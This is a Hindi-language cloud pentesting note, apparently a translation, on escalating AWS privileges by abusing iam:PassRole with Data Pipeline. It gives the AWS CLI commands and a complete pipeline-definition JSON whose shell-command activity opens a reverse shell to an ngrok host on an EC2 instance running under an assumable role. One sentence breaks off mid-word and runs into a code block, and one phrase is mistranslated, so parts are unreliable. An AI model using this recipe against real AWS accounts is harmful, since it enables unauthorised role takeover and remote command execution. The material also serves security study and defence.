डेटापाइपलाइन

डेटापाइपलाइन के बारे में अधिक जानकारी के लिए देखें:

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

इन अनुमतियों वाले उपयोगकर्ता डेटा पाइपलाइन बनाकर उनके निर्धारित भूमिका की अनुमतियों का उपयोग करके विभिन्न कमांडों को निषेध कर सकते हैं।

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

पाइपलाइन निर्माण के बाद, हमलावर इसकी परिभाषा को अपडेट करता है ताकि विशिष्ट क्रियाएँ या संसाधन निर्माण को निर्दिष्ट किया जा सके:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

ध्यान दें कि **लाइन 14, 15 और 27** में **रोल** एक रोल होना चाहिए जो **datapipeline.amazonaws.com** द्वारा अस्सुम किया जा सकता है और **लाइन 28** में रोल को **ec2.amazonaws.com द्वारा अस्सुम क ```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` **पाइपलाइन परिभाषण फ़ाइल, जिसे हमलावर द्वारा तैयार किया गया है, में निर्देशिकाएँ शामिल हैं जो AWS API के माध्यम से कमांड निष्पादित करने** या संसाधन बनाने की अनुमतियों का उपयोग करती है, डेटा पाइपलाइन की भूमिका अनुमतियों का उपयोग करके अतिरिक्त विशेषाधिकार प्राप्त करने की संभावना है।

संभावित प्रभाव: निर्दिष्ट ईसी2 सेवा भूमिका को सीधे उन्नति।

संदर्भ

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/